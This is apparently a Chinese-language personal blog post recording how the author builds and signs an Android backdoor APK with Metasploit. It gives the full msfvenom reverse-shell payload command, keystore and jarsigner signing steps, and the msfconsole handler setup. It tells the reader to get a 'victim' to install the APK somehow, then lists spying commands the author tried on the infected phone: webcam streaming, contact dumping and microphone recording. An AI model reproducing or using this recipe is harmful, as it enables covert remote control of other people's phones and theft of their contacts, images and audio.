自從上次用android安裝完Kali Linux之後,就再也沒有啟動了,最近看到可以用Metasploit安裝Android後門程式的文章,所以就動手做看看,有很多文章影片都過時了, 下面這一篇經測試是目前可行的

https://resources.infosecinstitute.com/lab-hacking-an-android-device-with-msfvenom/#gref

但是預先要先安裝好工具,才不會中斷步驟,光是找工具安裝,我就遇了很多次坑,記錄下來避免忘記

安裝jdk,一開始以為內建java 會有,結果只有內建jre,所以jarsigner不會有 

sudo apt-get install openjdk-11-jdk

然後就會找不到…會有很多文章要你換source.list的路徑,又或是sudo add-apt-repository,然後就一直找不到…

正解是

sudo apt install software-properties-common

sudo apt-get install openjdk-11-jdk

sudo apt-get install zipalign

如果安裝有出錯,就先sudo apt-get update

好了之後,就可以開啟手機的Kali Linux Terminal視窗進行apk的封裝,IP換成自己的,port 用文章上的

我的手機APP termux

nethunter

kex start

然後用VNC Client連手機open Terminal,產生apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.10  LPORT=4444 R > android_shell.apk

產生key,會要你打一些基本資料和密碼

keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

簽名 驗章 加簽

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

jarsigner -verify -verbose -certs android_shell.apk

產生簽章過的檔案

zipalign -v 4 android_shell.apk singed_jar.apk

完成後就把singed_jar.apk想辦法讓victim 受害者 安裝,但是Metasploit 產生的檔案已經被列管了,郵寄和安裝下載都會出現警告,預設安裝是裝不起來的,如果有人安裝了,就可以回到我們的msfconsole來操控,文章是寫run,但是我是用exploit,可以用我就沒試有什麼不同,打help有一些命令可以使用,我最先試的是相機功能webcam_stream,結果圖片出不來,通訊錄dump_contacts可以匯出,可以錄聲音record_mic

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost = 192.168.0.10

set lport = 4444

exploit

help

最後修改日期: 22/09/2020

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。